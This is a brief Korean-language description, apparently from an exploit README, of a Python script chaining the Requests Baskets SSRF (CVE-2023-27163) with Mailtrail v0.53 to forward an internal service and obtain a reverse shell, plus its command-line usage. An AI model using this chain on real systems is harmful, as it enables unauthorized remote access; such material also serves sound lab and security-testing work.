
Python exploit은 Requests Baskets의 CVE-2023-27163 SSRF를 Mailtrail v0.53과 연쇄하여 내부 서비스를 포워딩하고 리버스 셸을 실행합니다.
다음 익스플로잇은 Requests Baskets v1.2.1 SSRF 취약점을 악용하여 127.0.0.1:80에서 실행 중인 내부 애플리케이션을 /pwned의 외부 애플리케이션으로 포워딩합니다. Mailtrail v0.53 애플리케이션이 포워딩되면 해당 애플리케이션에 대해 리버스 셸 명령을 실행하고, 몇 초 이내에 사용자는 머신에 대한 리버스 셸을 획득하게 됩니다.
python3 ./exploit http://10.10.10.10:55555 LISTENER-IP LISTENER-PORT